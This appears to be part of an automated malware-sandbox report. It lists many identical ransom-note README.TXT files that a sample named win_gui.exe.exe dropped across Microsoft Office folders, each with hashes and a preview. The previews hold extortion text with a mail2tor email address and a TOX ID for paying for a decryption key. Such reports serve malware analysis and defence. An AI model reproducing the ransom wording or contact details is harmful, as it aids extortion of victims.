                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_f2\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_f33\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_f4\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_f7\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FPA_w1\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\FloodgateExperiences\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\Library\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\LivePersonaCardRollback\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\LivePersonaCard\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\LogoImages\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\Media\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\OneNote\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\OutlookAutoDiscover\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\OutlookReactNative\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Office16\PAGESIZE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
